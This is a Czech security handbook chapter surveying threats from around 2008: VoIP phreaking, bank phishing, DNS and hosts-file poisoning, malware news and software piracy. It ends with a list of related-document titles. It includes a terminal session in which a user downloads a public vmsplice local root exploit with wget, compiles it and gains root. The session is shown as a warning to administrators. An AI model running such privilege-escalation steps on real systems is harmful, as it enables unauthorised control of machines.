2/2 PŘEHLED ZAJÍMAVOSTÍ V OBLASTI SECURITY ZA POSLEDNÍ OBDOBÍ

Rozměr: px
Začít zobrazení ze stránky:

Download "2/2 PŘEHLED ZAJÍMAVOSTÍ V OBLASTI SECURITY ZA POSLEDNÍ OBDOBÍ"

Transkript

1 BEZPEČNÁ POČÍTAČOVÁ SÍŤ část 2, díl 2, str. 1 2/2 PŘEHLED ZAJÍMAVOSTÍ V OBLASTI SECURITY ZA POSLEDNÍ OBDOBÍ V poslední době se situace z hlediska bezpečnosti dost podstatným způsobem zhrošila. Hrozby typu virů a podobných jevů se podle světových statistik spíše snižují nebo stagnují. O tisíce procent však narůstají škody, které jsou přímo vyčíslitelné. Jsou hromadně napadány služby VoIP v Evropě, jsou napadány ústředny telekomunikačních operátorů i ústředny jejich zákazníků, zdokonalují se metody pishingu. Pod pojmem phreaking rozumíme činnost, která vede k bezplatnému využívání telefonních linek (napichování služby, hovory na účet někoho jiného nebo na účet telekomunikační firmy). Phreaking má bohatou čtyřicetiletou historii. Původní telefandové pokládali phreaking za jistou formu zábavy. Postupně však phreaking přestal být módou a phreakeři (používají ukradené telekomunikační informace pro přístup k dalším počítačům) či phrackeři (snaží se napadat programy a zneužívat databáze telefonních společ- Hrozby v posledním období

2 část 2, díl 2, str. 2 BEZPEČNÁ POČÍTAČOVÁ SÍŤ Co je to pishing SCAM? Možnosti kontaktu s obětí ností za účelem získání telefonních služeb zdarma) se začali učit pronikat do počítačových systémů. Hackeři (white hats) se od této skupiny distancují. Skoro všechna zařízení všech výrobců implementujících SIP protokol mají problémy. Škody známé autorovi v ČR za posledního půl roku dosahují desítek milionů korun. VoIP je použitelný, ale musí být velmi dobře zabezpečen: jednotlivá zařízení musejí být umístěna v chráněné oblasti sítě, prioritně je třeba zabezpečit prostředky pro správu ústředen, musejí být pravidelně a často kontrolovány záznamy o přístupu, je vhodné implementovat Fraud detection systém pro včasné zachycení podvodných volání a nelegálního provozu, je vhodné mít postupy pro řešení následků včetně shromáždění důkazů a oznámení událostí orgánům činným v trestním řízení. Čenářům jsou jistě známy především neutuchající útoky na elektronické bankovnictví České spořitelny. Věnujme se této problematice trochu podrobněji. Jedná se o snahu útočníka (autora viru, hackera...) navodit u své oběti dojem, že prostřednictvím internetu (elektronické pošty nebo webu) komunikuje se svou bankou nebo platební společností, a získat tak přihlašovací údaje pro přístup k účtu oběti. U elektronické pošty jde o systém zcela prozaický. Oběti je doručen s falešnou adresou odesílatele. Obsahuje barvy a loga, která jsou typická pro konkrétní banku nebo platební společnost. Dále se zde nachází text vyzývající k vyplnění formuláře v u,

3 BEZPEČNÁ POČÍTAČOVÁ SÍŤ část 2, díl 2, str. 3 kde se nachází takové položky jako číslo účtu oběti a její PIN. Po vyplnění formuláře a odeslání jsou takto získaná data odeslána útočníkovi. V u může být rovněž doplňující text vyzývající ke zpracování mailu obětí s tím, že je to nutná součást posilování bezpečnosti banky apod. O rozesílání závadného u se zpravidla stará virus. Kromě komunikace prostřednictvím elektronické pošty může být oběti rovněž podvržen obsah webu. Oběť má za to, že se nachází na webové stránce banky, avšak ve skutečnosti komunikuje s webovými stránkami útočníka. Ten si dopředu zajistil, že se bude adresa webu banky u oběti překládat na IP adresu útočníka. Pokud se chce majitel účtu přihlásit ke svému účtu prostřednictvím webu, tak zadá do adresního pole webového prohlížeče adresu stránek banky. Tato adresa se však nepřeloží na IP adresu webu banky, ale útočníka. K dosažení takového stavu se nabízejí tři možnosti: 1. útok na name server banky, 2. útok na DNS server ISP, 3. úpravy v systému oběti. Nutno podotknout, že jde o útok z uvedených tří možností nejobtížnější a pokud by byl možný a zejména pak zůstal bez povšimnutí, jde o selhání základních principů bezpečnosti. Plánované změny záznamů name serverů banky by měly mít stanovenou proceduru a jejich stálý monitoring by měl mít vysokou prioritu. Takový útok je mnohem cílenější a jeho nebezpečí spočívá v tom, že během krátké doby obsáhne velké množství potenciálních obětí. Podstatou útoku je vytvoření nebo změna příslušného záznamu mající vztah Podvržený obsah webu Útok na name server banky Útok na DNS server ISP

4 část 2, díl 2, str. 4 BEZPEČNÁ POČÍTAČOVÁ SÍŤ Úpravy v systému oběti Oběť navštívila web účočníka - co dál? k adrese banky v DNS forwarderu ISP. Pokud po útoku bude kdokoliv z klientů ISP používajících tento DNS forwarder požadovat IP adresu webu banky, tak se mu vrátí IP adresa útočníka. U rozšířeného systému BIND se jedná o manuální editaci souboru [/etc/named.conf] apod. Samotné editaci bude předcházet předchozí zneužití bezpečnostní chyby nebo špatné zabezpečení serveru. Takto podvržený záznam se dle specifikace RFC 1035 nejpozději do 24 hodin automaticky opraví. Snad všechny systémy mají ve výchozím nastavení sítě konvenčně zahrnuto při spuštění procesu překladu určitého doménového jména na IP adresu vyhledávání v souboru [hosts]. Pokud se do tohoto souboru umístí záznam [doménové jméno webu banky & IP adresa útočníka], tak se s tímto údajem resolver spokojí a vrátí ho jako platný údaj. Důsledek je zřejmý. U Windows se jedná díky uživatelské přívětivosti Sdílení souborů a tiskáren v sítích Microsoft a neuváženému používání systémového účtu administrátora mnohdy navíc s prázdným heslem o útok jednoduchý. Jakmile se totiž uživatel takto přihlásí do systému a pohybuje se v internetu, tak je jeho systém a pevný disk k dispozici. Zobrazí se jí webová stránka s formulářem, jež je vyvedena v barvách, které jsou pro banku typické. Na stránce se může nacházet informace o probíhající údržbě webové prezentace, takže je nyní možné prostřednictvím webu pouze přihlášení k účtu - přihlašovací formulář je o pár řádků níže. Pokud oběť formulář použije (vyplní uživatelské jméno + PIN a tyto informace odešle), tak je odešle útočníkovi. Některé banky vyžadují pro přihlášení uživatele klientský certifikát. V uvedeném formuláři se proto bude nacházet ještě prvek <input type= submit...>.

5 BEZPEČNÁ POČÍTAČOVÁ SÍŤ část 2, díl 2, str. 5 Především je potřeba si uvědomit, že žádná korektní banka, platební společnost apod. nebudou nikdy chtít po svém klientovi zaslání osobních údajů prostřednictvím elektronické pošty. Pokud by k takovému náznaku došlo, tak by měl klient danou společnost obratem kontaktovat a žádat vysvětlení. Jakmile se klientovi zobrazí webová stránka obsahující přihlašovací formulář k účtu, tak se musí jednat o zabezpečený (šifrovaný) přenos dat na základě certifikátu s délkou klíče minimálně 128 bitů (zákon č. 101/2000 Sb., o ochraně osobních údajů). Dnes již každý webový prohlížeč umožňuje zobrazení tohoto certifikátu. Při jeho zobrazení je nutné věnovat pozornost zejména tomu, pro jaké jméno serveru byl vystaven a zda ho vydala důveryhodná certifikační autorita. Dále je k dispozici sériové číslo, pro jehož ověření porovnáním je možné kontaktovat banku a požadovat jeho sdělení. Poslední tzv. Fingerprint je docela problém. Neexistuje uživatel, který by si toto číslo pamatoval, a tak se může stát, že se mu to bude jevit jako nový certifikát bankovního ústavu, on odklepne volbu akceptovat certifikát a problém je na světě. Ochrana aplikací na virtuálních serverech má mezery - Options seen lacking in firewall virtual server protection. Podle Gartnerovy zprávy síťové firewally nechrání před průběhem komunikace mezi virtuálními servery umístěnými na témže HW. Ty spolu totiž komunikují přímo a externě umístěné firewally a IPS jejich komunikaci nemají šanci zachytit. Problémy mělo i Vmware a konkrétně sdílené složky s hostitelským systémem. Jejich prostřednictvím bylo možné získat kontrolu nad hostitelským systémem. Ochrana uživatele Situace v oblasti software

6 část 2, díl 2, str. 6 BEZPEČNÁ POČÍTAČOVÁ SÍŤ Máte připravené bezpečnostní politiky, které lze použít při vývoji aplikací? Security Policies in the Application Development Process - John Steer z Microsoftu poukazuje na častý nedostatek - zanedbání bezpečnostních aspektů ve fázi vývoje je obvykle důsledkem nezformulovaných bezpečnostních zásad a jejich uplatňování. Vývojáři obvykle nemají k dispozici závazné bezpečnostní politiky, které by ve vlastním vývoji mohli uplatňovat. Viz také článek Michaela Cobba - Enterprise security in 2008: Building trust into the application development process, který se v dané souvislosti dotýká konkrétnějších problémů. Poměrně užitečným se zde především v oblasti WWW aplikací může jevit dokumentace na URL kde najdete řadu dokumentů k tomu, jak bezpečnost těchto aplikací zajistit a také jak ji testovat. Protože se jedná skutečně o důležitou oblast, nabídneme v této a následujících aktualizacích tohoto díla tuto oblast podrobněji čtenářům, a to prostřednictvím nových autorů Vladimíra Kota a Kamila Golombeka. Na otázku, proč jsou webové aplikace často zranitelné, odpovídá Robert Vamosi v poznatcích získaných z rozhovoru s Chrisem Wysopalem - When Web apps attack. Zranitelnosti (a jejich zneužití) se objevují nejen například na pornografických stánkách, ale nejčastěji to bývá na stránkách, které lze charakterizovat jako amatérské stránky, kde jsou prezentovány různé koníčky (StopBadware, Harvard University). V podstatě každý počítač obsahuje nezáplatovanou aplikaci - Nearly every Windows PC likely harbors an unpatched app, Secunia says. 95 procent počítačů obsahuje jeden či více zranitelných programů, říká Se-

7 BEZPEČNÁ POČÍTAČOVÁ SÍŤ Analýzu stínové ekonomiky malware obsahuje článek The malware shadow economy. Ian Williams zachycuje klíčové momenty interview s Maksymem Schipkou (Message labs). Interview si lze také vyslechnout (odkaz na MP3 soubor je uvnitř článku). Ekonomika internetového podsvětí se pohybuje v rozčást 2, díl 2, str. 7 cunia - na základě testů provedených pomocí utility Personal Software Inspector. Byla nainstalována v uplynulém týdnu na počítačích. Charles Babcock v přehledu Open Source Code Contains Security Holes komentuje výsledky analýzy amerického ministerstva pro národní bezpečnost (Department of Homeland Security). Analýza se týkala open source a jeho vztahu k zjištěným zranitelnostem a bezpečnostním chybám. Recenzi knihy Networking with Microsoft Windows Vista napsal Adam Robertson. Autorem knihy je Paul McFedries, kniha má 552 stran a vyšla v prosinci Na stránce Networking with Microsoft Windows Vista: Your Guide to Easy and Secure Windows Vista Networking najdete její obsah, popř. si ji můžete zakoupit. Tony Bradley v článku Information protection: Using Windows Rights Management Services to secure data uvádí stručný přehled služeb WRMS Windows Rights Management Services) a řadu doporučení k jejich využití pro ochranu dat. Používáte Ad-Aware SE Personal (bezplatná verze)? Pak si přečtěte tuto informaci - Important Update For Ad-Aware SE Users. Společnost Lavasoft přestala 31. prosince aktualizovat tento SW. Lze ho však odinstalovat a nainstalovat si bezplatný Ad-Aware Malware

8 část 2, díl 2, str. 8 BEZPEČNÁ POČÍTAČOVÁ SÍŤ Hackeři sahu cca 105 miliard US dolarů a přesahuje svým objemem drogovou ekonomiku. Bude červ Nugache nebezpečnější než Storm? Ellen Messmer v Nugache worm kicking up a Storm upozorňuje, že tento dva roky starý červ byl v posledních měsících upraven (hackery z RBN - Russian Business Network), vzorem k tomu byl právě Storm a má nyní nové nebezpečné vlastnosti. Top threats and security trends for 2008, přehled obsahuje dva žebříčky: Top ten web exploits for 2007 atop security threats expected in Viz také Žebříček virových hrozeb loňska. Kdo vyhrál?. Poznámka: Oba články uvádí jako autora přehledu AVG, jedná se samozřejmě o společnost Grisoft (u českého článku, to zůstalo jen v druhé jeho části - zástupci AVG). Objevil se nový typ útoku - malware (rootkit) pro MBR (Master Boot Record) - Excuse me sir: there s a rootkit in your master boot record, podle popisu je to skutečně nebezpečný typ malware. Může dokonce přežít reinstalaci systému. Viz podrobnou analýzu na stránce Stealth MBR rootkit. Dále se jím také zabývá článek Return of the boot-sector virus a nověji také New rootkit hides in hard drive s boot record. Cloaking malware holes up where Windows can t find it, say researchers. Jak se bránit novým trikům počítačových útočníků - Jakub Dvořák na Technetu: Víte, jaká bezpečnostní rizika na vás a váš počítač číhají v tomto roce? Přibudou hrozby pocházející z webových aplikací, na vzestupu budou i ty dosud méně známé či se objeví zcela nové. A majitele Windows Vista čeká zkouška ohněm.

9 BEZPEČNÁ POČÍTAČOVÁ SÍŤ část 2, díl 2, str. 9 Sally Whittle v Anatomy of a hack attack s pomocí bezpečnostních expertů vytváří podobu typického hackerského útoku na dvě velké organizace. Krok po kroku pak rozebírá, jak by v takovém případě měl postupovat šéf IT. Útok SQL injection byl příčinou hromadného hacku desetitisíců webů - Mass hack infects tens of thousands of sites. Then they serve visitors multiple exploits, including October RealPlayer attack. I když je řada z těchto webů již očištěna, přesto se příslušný škodlivý skript stále dá najít na velkém počtu webových serverů. Webová stránka Geeks.com měla certifikát pro bezpečný web, ale přesto byla hacknuta - Update: Hacker safe Web site gets hit by hacker. Vedlo to následně ke kompromitaci citlivých dat zákazníků (jména, adresy, telefonní čísla a čísla kreditních karet Visa). Pro získání celkového přehledu osob pohybujících se v digitálním undergroundu jsou uvedeny další pojmy: samuraj - útočník, který pronikne do systému, avšak následně správci oznámí bezpečnostní nedostatky a poskytne mu konkrétní rady, script-kiddies - začínající útočníci s průměrnými znalostmi, kteří dokáží na internetu najít kód a mírně ho upravit, např. pro spuštění nové varianty viru (převážně využívají nástroje vytvořené jinými útočníky - skripty), packet monkeys - nezkušení uživatelé, kteří provádějí DoS útoky či jiné útoky nevyžadující prolomení ochrany, opět za použití utilit vytvořených jinými, phreaker/phracker - útočník, který proniká a zneužívá telefonních sítí,

10 část 2, díl 2, str. 10 BEZPEČNÁ POČÍTAČOVÁ SÍŤ phisher - útočník, který vytváří identické webové stránky většinou různých finančních institucí a poté ukradne a zneužije citlivé údaje uživatelů, kteří je zadají v domnění, že jde o oficiální stránky instituce, knacker - útočník, který odstraňuje ochranný kód programu za účelem jeho volného používání, looser/lamer - uživatelé neznalí prostředí IT. Softwarové pirátství je pravděpodobně nejproblematičtější oblastí neoprávněných zásahů do autorského díla. Každý uživatel počítače si shání SW dle svého zájmu, účelu a pochopitelně též finančních možností. Počítačovým programem nemáme na mysli jen různé kancelářské aplikace, rozmanité utility pro práci s grafikou, ale také hry, které jsou častou obětí softwarového pirátství u dětí a mládeže. Dalším oblíbeným artiklem, který se ocitá ve spárech pirátství, jsou hudební (nejčastěji v komprimovaném formátu MP3) a filmová díla (formát AVI, DivX apod.). S pirátstvím je neodmyslitelně spjata problematika výroby a užívání tzv. cracků ( 43 TrZ). Tímto pojmem rozumíme program, který umožňuje plně funkční užívání časově omezeného nebo jinak chráněné aplikačního programu nebo hry. Kromě cracků je na internetu také zveřejňováno velké množství sériových čísel (např aj.) k nezměrnému počtu programů, po jejichž zadání se program stává plně funkčním. Dalším typem překonávání důkladnější ochrany, a to tzv. hardwarového klíče, který je implementován u dražších programů, jako např. AutoCAD, je tzv. reverse ingeneering (zpětná dekompilace systému). Následně stačí přeskočit komunikaci s HW klíčem nebo test daného omezení. V řadě případů je to pro takové osoby výzvou a někdy stačí zadat požadavek na prolomení dané

11 BEZPEČNÁ POČÍTAČOVÁ SÍŤ Nejpopulárnější formou pro sdílení nelegálního obsahu jsou tzv. peer-to-peer sítě - P2P (opak architektury klient-server). Oblíbenost výměnných sítí spočívá v tom, že s rostoucím množstvím uživatelů celková dostupná přenosová kapacita roste, zatímco u modelu client-server, kdy se uživatelé musí dělit o konstantní kapacitu serveru, průměrná přenosová rychlost při nárůstu uživatelů klesá. Tyto programy pro sdílení souborů, jako např. Direct Connect (DC, DC++), BitTorrent, WarezP2P, emule apod., umožčást 2, díl 2, str. 11 aplikace a během pár dnů dostanete výsledek. Ovšem pochopitelně nevíte, co ještě jste případně k výsledku získali. Fenomén warezu je výsledkem nástupu moderních ICT, a to především internetu. Zatímco do nástupu warezu šlo o izolované obory pirátství v oblasti SW, hudby a videa, díky rychlé přenosové kapacitě internetu a stále se zdokonalujícím kompresním formátům dat spolu se zařízením pro jejich uchovávání se dnes spojují všechny tyto tři činnosti do jedné. Princip warez scény je postaven na bázi non-profit. Drtivá většina lidí toto pravidlo respektuje a chová se podle něj. Jediné, co jednotlivec nebo skupina získají, je respekt konkurenčních skupin v případě kvalitních výsledků. Warez bývá doménou skupin, které se vyznačují poměrně vysokou mírou specializace a dělby práce. V každé takové skupině většinou bývá jeden či několik crackerů, kteří se zabývají obcházením ochrany proti kopírování zabudované v programech. Další se věnují propagaci, tvorbě webových stránek s upoutávkami na své produkty, tvorbou katalogů, které jsou rozesílány, reklamních letáků atp.

12 část 2, díl 2, str. 12 BEZPEČNÁ POČÍTAČOVÁ SÍŤ Bezpečnost jádra Linuxu ňují vyhledávání podle jména, žánru či klíčového slova týkající se hudby, filmů či SW. Odhaduje se, že na internetu se nachází téměř miliarda nelegálně nasdílených hudebních skladeb. Dnešní anonymní výměnné sítě umožňují (legální i nelegální) výměnu souborů s prakticky nulovou mírou odpovědnosti jednotlivých uživatelů. Dochází však k žalobám (zejména v USA) na provozovatele takových sítí, které podávají zástupci autorů a organizace, jako je RIAA či MPAA. Poslední známou událostí je zastavení serveru thepiratebay.org. V posledním období se objevují bezpečnostní problémy nejen v MS Windows, ale i v Linuxu. Docela zajímavý je následující exploit, který umožňuje získat v systému pro běžného uživatele práva superuživatele. ber@toad:~$ uname -a Linux toad #1 Mon Dec 24 16:04:42 UTC 2007 i586 GNU/Linux ber@toad:~$ id uid=500(ber) gid=100(users) skupiny=100(users),502(vboxusers) ber@toad:~$ whoami ber ber@toad:~$ wget -nv its/27704.c 13:13:30 URL: ploits/27704.c [6264/6264] -> c [1] ber@toad:~$ gcc c -o ber@toad:~$./ Linux vmsplice Local Root Exploit By qaaz

13 BEZPEČNÁ POČÍTAČOVÁ SÍŤ část 2, díl 2, str. 13 [+] mmap: 0x0.. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x x2000 [+] page: 0x1000 [+] mmap: 0xb7da xb7ddb000 [+] root id uid=0(root) gid=0(root) skupiny=0(root),1(bin),2(daemon),3(sys),4( adm),6(disk),10(wheel) whoami root Takže pokud spravujete někde Linux systémy, je třeba dávat pozor na takovéto problémy. Není dobré spojovat služby a např. na jednom systému provozovat systém pro práci uživatelů s přístupem přes SSH a např. ový systém organizace. Problém v tomto případě může být ten, že se uživatel dostane k ovým schránkám ostatních uživatelů. To nemusí být žádoucí a asi to není ani očekávaný stav.

14 část 2, díl 2, str. 14 BEZPEČNÁ POČÍTAČOVÁ SÍŤ

Práce s e-mailovými schránkami v síti Selfnet

Práce s e-mailovými schránkami v síti Selfnet Práce s e-mailovými schránkami v síti Selfnet Obsah návodu Základní informace k nastavení schránky selfnet.cz...2 Doporučené parametry nastavení e-mailového klienta...2 Základní informace k nastavení e-mailové

Více

Po ukončení tohoto kurzu budete schopni:

Po ukončení tohoto kurzu budete schopni: PRÁCE S INTERNETEM A KOMUNIKACE Hana Rohrová, Roman Rohr Cíle kurzu Po ukončení tohoto kurzu budete schopni: porozumět základním pojmům spojeným s používáním Internetu, dodržovat bezpečnostní opatření

Více

Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost

Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost Registrační číslo projektu: CZ.1.07/1.5.00/34.0553 Elektronická podpora zkvalitnění výuky CZ.1.07 Vzděláním pro konkurenceschopnost Projekt je realizován v rámci Operačního programu Vzdělávání pro konkurence

Více

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Číslo projektu: CZ.1.07/1.5.00/34.0410 Číslo šablony: 17 Název materiálu: Ročník: Identifikace materiálu: Jméno autora: Předmět: Tématický celek:

Více

Ope p r e a r čn č í s ys y té t m é y y Windo d w o s Stručný přehled

Ope p r e a r čn č í s ys y té t m é y y Windo d w o s Stručný přehled Windows 2008 R2 - úvod Jan Žák Operační systémy Windows Stručný přehled Klientské OS Windows 95, 98, ME Windows NT Windows 2000 Windows XP Windows Vista Windows 7 Windows CE, Windows Mobile Windows Phone

Více

Aktuální hrozby internetu. 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě

Aktuální hrozby internetu. 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě Aktuální hrozby internetu 1.Trojské koně (malware) 2.Phishing 3.Sociální sítě Trojské koně Viz předchozí hodina. Škodlivý program, který v počítači vytváří podmínky pro přijímání dalších škodlivých programů.

Více

Typy bezpečnostních incidentů

Typy bezpečnostních incidentů Typy bezpečnostních incidentů Aleš Padrta CESNET, z. s. p. o. Praha 12.12. 2008 Obsah Úvodní slovo Co je to bezpečnostní incident Klasifikace bezpečnostních incidentů Pojmy související s bezpečnostními

Více

2. Nízké systémové nároky

2. Nízké systémové nároky FIREMNÍ ŘEŠENÍ ESET firemní řešení 1/6 Při každodenním používání bezpečnostního softwaru jsou nejdůležitější jeho vlastnosti. V ESETu si myslíme, že firemní řešení má být rychlé a snadno spravovatelné.

Více

Elektronické bankovnictví IV. čtvrtek, 31. května 12

Elektronické bankovnictví IV. čtvrtek, 31. května 12 Elektronické bankovnictví IV. Hrozby elektronického bankovnictví Slepá důvěra a hloupost = možnost zneužití sociálního inženýrství Phishing Vážený kliente, obracíme se na Vás se žádostí ověření vašeho

Více

Příručka nastavení funkcí snímání

Příručka nastavení funkcí snímání Příručka nastavení funkcí snímání WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_CS 2004. Všechna práva vyhrazena. Uplatňovaná ochrana autorských práv se vztahuje na všechny formy a záležitosti

Více

INTERNETOVÉ BANKOVNICTVÍ

INTERNETOVÉ BANKOVNICTVÍ INTERNETOVÉ BANKOVNICTVÍ Základní informace pro správnou funkčnost služby Internetového bankovnictví Obsah 1. Úvod 2 2. Základní informace pro správnou funkčnost SLUŽBY INTERNETOVÉHO BANKOVNICTVÍ 3 1/4

Více

Bezpečnost ve světě ICT - 10

Bezpečnost ve světě ICT - 10 Informační systémy 2 Bezpečnost ve světě ICT - 10 Přednáší: doc. Ing. Jan Skrbek, Dr. - KIN Přednášky: pondělí 8 50 10 25 Spojení: e-mail: jan.skrbek@tul.cz tel.: 48 535 2442 Obsah: Bezpečnostní hrozby

Více

Bezpečnost internetového bankovnictví, bankomaty

Bezpečnost internetového bankovnictví, bankomaty , bankomaty Filip Marada, filipmarada@gmail.com KM FJFI 15. května 2014 15. května 2014 1 / 18 Obsah prezentace 1 Bezpečnost internetového bankovnictví Možná rizika 2 Bankomaty Výběr z bankomatu Možná

Více

CZ.1.07/1.5.00/34.0527

CZ.1.07/1.5.00/34.0527 Projekt: Příjemce: Digitální učební materiály ve škole, registrační číslo projektu CZ.1.07/1.5.00/34.0527 Střední zdravotnická škola a Vyšší odborná škola zdravotnická, Husova 3, 371 60 České Budějovice

Více

Výukový materiál zpracovaný v rámci projektu CZ.1.07/1.4.00/21.2374, Modernizace výuky

Výukový materiál zpracovaný v rámci projektu CZ.1.07/1.4.00/21.2374, Modernizace výuky Výukový materiál zpracovaný v rámci projektu CZ.1.07/1.4.00/21.2374, Modernizace výuky Šablona: III/2 Sada: 3 Ověření ve výuce: (nutno poznamenat v TK) Třída: IX.A Datum: 10. 12. 2013 IX.B 17. 12. 2013

Více

Daniela Lišková Solution Specialist Windows Client. daniela.liskova@microsoft.com

Daniela Lišková Solution Specialist Windows Client. daniela.liskova@microsoft.com DESKTOP: Windows Vista Daniela Lišková Solution Specialist Windows Client daniela.liskova@microsoft.com TCO desktopů analýzy spol. Gartner Téměř 80% všech nákladů v IT vzniká po nákupu tj. na správě, opravě,

Více

Masarykova střední škola zemědělská a Vyšší odborná škola, Opava, příspěvková organizace

Masarykova střední škola zemědělská a Vyšší odborná škola, Opava, příspěvková organizace Masarykova střední škola zemědělská a Vyšší odborná škola, Opava, příspěvková organizace Číslo projektu Číslo materiálu Autor Průřezové téma Předmět CZ.1.07/1.5.00/34.0565 VY_32_INOVACE_293_Bezpečnost_v_síti

Více

Bezpečnostní aspekty informačních a komunikačních systémů KS2

Bezpečnostní aspekty informačních a komunikačních systémů KS2 VŠFS; Aplikovaná informatika; SW systémy 2005/2006 1 Bezpečnost informací BI Ing. Jindřich Kodl, CSc. Bezpečnostní aspekty informačních a komunikačních systémů KS2 VŠFS; Aplikovaná informatika; SW systémy

Více

Zabezpečení kolejní sítě

Zabezpečení kolejní sítě Zabezpečení kolejní sítě Informační a administrační systém P@wouk Bezpečnostní hrozby, základní zabezpečení a prevence Ing. Tomáš Petránek tomas@petranek.eu Seminář o bezpečnosti a anonymitě na Internetu

Více

Bezpečnost. Michal Dočekal

Bezpečnost. Michal Dočekal Michal Dočekal 2011 Právní doložka Právní doložka autor není právník autor neručí za pravdivost uvedených informací autor neručí za jakékoliv případné škody způsobené uvedenými informaci Osnova 1 Bezpečnost

Více

1. Způsoby zabezpečení internetových bankovních systémů

1. Způsoby zabezpečení internetových bankovních systémů Každoročně v České republice roste počet uživatelů internetu, přibývá povědomí o internetových službách, uživatelé hojně využívají internetového bankovnictví. Podle údajů Českého statistického úřadu ve

Více

GDPR A INFORMAČNÍ SYSTÉM. Nadežda Andrejčíková Libor Piškula

GDPR A INFORMAČNÍ SYSTÉM. Nadežda Andrejčíková Libor Piškula GDPR A INFORMAČNÍ SYSTÉM Nadežda Andrejčíková Libor Piškula GDPR a informační systém Obsah: 1. Principy ochrany 2. Legitimnost zpracování osobních údajů 3. Praktické dopady GDPR 4. Technologické aspekty

Více

Úvod - Podniková informační bezpečnost PS1-2

Úvod - Podniková informační bezpečnost PS1-2 VŠFS; Aplikovaná informatika - 2006/2007 1 Bezpečnost informací BI Ing. Jindřich Kodl, CSc. Úvod - Podniková informační bezpečnost PS1-2 VŠFS; Aplikovaná informatika - 2006/2007 2 Literatura Kovacich G.L.:

Více

Registrační číslo projektu: Škola adresa: Šablona: Ověření ve výuce Pořadové číslo hodiny: Třída: Předmět: Název: E-mail I víme o něm vše?

Registrační číslo projektu: Škola adresa: Šablona: Ověření ve výuce Pořadové číslo hodiny: Třída: Předmět: Název: E-mail I víme o něm vše? Registrační číslo projektu: CZ.1.07/1.4.00/21.3712 Škola adresa: Základní škola T. G. Masaryka Ivančice, Na Brněnce 1, okres Brno-venkov, příspěvková organizace Na Brněnce 1, Ivančice, okres Brno-venkov

Více

File Transfer Protocol (FTP)

File Transfer Protocol (FTP) File Transfer Protocol (FTP) protokol pro přenos souborů, jeden z klasických RFC 959 přehled specifikací na http://www.wu-ftpd.org/rfc/ opět architektura klient-server navržen s ohledem na efektivní využívání

Více

Vývoj Internetových Aplikací

Vývoj Internetových Aplikací 10 Vývoj Internetových Aplikací Bezpečnost Ing. Michal Radecký, Ph.D. www.cs.vsb.cz/radecky https://www.ted.com/talks/mikko_hypponen_fighting_ viruses_defending_the_net Co je to Cyber kriminalita http://www.internetprovsechny.cz/pocitacova-kriminalita-a-bezpecnost/

Více

Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra

Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra Postup nastavení bezpečné E-mailové schránky pro zákazníky Logicentra Důvod přidělování speciálních schránek. Podle posledních statistik kolem 90 % všech E-mailů na Internetu tvoří nevyžádaná pošta. Patří

Více

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115

Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Gymnázium a Střední odborná škola, Rokycany, Mládežníků 1115 Číslo projektu: Číslo šablony: 27 Název materiálu: Ročník: Identifikace materiálu: Jméno autora: Předmět: Tématický celek: Anotace: CZ.1.07/1.5.00/34.0410

Více

Není cloud jako cloud, rozhodujte se podle bezpečnosti

Není cloud jako cloud, rozhodujte se podle bezpečnosti Není cloud jako cloud, rozhodujte se podle bezpečnosti Marcel Jánský Manažer útvaru produktů a podpory prodeje 26. 2. 2013 České Radiokomunikace Vysílací služby Profesionální telekomunikační operátor Poskytovatel

Více

ODEMČENÉ DVEŘE PRŮZKUM UKAZUJE, ŽE TISKÁRNY ČASTO BÝVAJÍ NEZABEZPEČENÉ PROTI KYBERNETICKÝM ÚTOKŮM

ODEMČENÉ DVEŘE PRŮZKUM UKAZUJE, ŽE TISKÁRNY ČASTO BÝVAJÍ NEZABEZPEČENÉ PROTI KYBERNETICKÝM ÚTOKŮM OFICIÁLNÍ ZPRÁVA ODEMČENÉ DVEŘE PRŮZKUM UKAZUJE, ŽE TISKÁRNY ČASTO BÝVAJÍ NEZABEZPEČENÉ PROTI KYBERNETICKÝM ÚTOKŮM Zatímco se týmy IT soustředí na jiná koncová zařízení, zabezpečení firemních tiskáren

Více

9. Software: programové vybavení počítače, aplikace

9. Software: programové vybavení počítače, aplikace 9. Software: programové vybavení počítače, aplikace Software (SW) je programové vybavení počítače, které nám umožňuje faktickou práci na počítači tvorbu dokumentů, tabulek, úpravy obrázků, elektronickou

Více

Tematický celek: Základy hardware a sítí. Učivo (téma): Hrozby internetu škodlivé programy

Tematický celek: Základy hardware a sítí. Učivo (téma): Hrozby internetu škodlivé programy Označení materiálu: VY_32_INOVACE_IKT_K_55 Autor: Jaromír Škrabal Tematický celek: Základy hardware a sítí Učivo (téma): Hrozby internetu škodlivé programy www.zlinskedumy.cz Stručná charakteristika Materiál

Více

Konfigurace pracovní stanice pro ISOP-Centrum verze 1.21.32

Konfigurace pracovní stanice pro ISOP-Centrum verze 1.21.32 Informační systém ISOP 7-13 Vypracováno pro CzechInvest Konfigurace pracovní stanice pro ISOP-Centrum verze 1.21.32 vypracovala společnost ASD Software, s.r.o. Dokument ze dne 20.2.2015, verze 1.00 Konfigurace

Více

Microsoft Windows Server System

Microsoft Windows Server System Microsoft Windows Server System Uživatelský autentikační systém od společnosti truconnexion komplexně řeší otázku bezpečnosti interních počítačových systémů ebanky, a.s. Přehled Země: Česká republika Odvětví:

Více

Dokumentace. k projektu Czech POINT. Popis použití komerčního a kvalifikovaného certifikátu

Dokumentace. k projektu Czech POINT. Popis použití komerčního a kvalifikovaného certifikátu Dokumentace k projektu Czech POINT Popis použití komerčního a kvalifikovaného certifikátu Vytvořeno dne: 11.4.2007 Aktualizováno: 19.2.2009 Verze: 3.3 2009 MVČR Obsah 1. Vysvětleme si pár pojmů...3 1.1.

Více

